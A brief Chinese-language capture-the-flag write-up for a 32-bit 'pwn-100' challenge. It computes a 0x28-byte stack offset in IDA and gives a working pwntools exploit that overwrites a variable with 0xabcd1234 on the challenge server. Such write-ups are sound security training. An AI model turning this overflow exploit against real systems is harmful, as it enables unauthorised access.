Pwn-pwn-100

题目地址 http://www.whalectf.xin/files/2779dd8a2562a1d5653c5c6af9791711/binary_100

 

32位 ，没有防护

 上IDA

很简单的栈溢出，覆盖变量v5，让其等于2882343476即可

双击&s和v5，找到他们位置

 

 0x34-0xc=0x28   然后把填充进来，就覆盖到v5

exp如下

from pwn import *
r=remote('bamboofox.cs.nctu.edu.tw',22001)

payload='a'*0x28+p32(0xabcd1234)
r.sendline(payload)
r.interactive()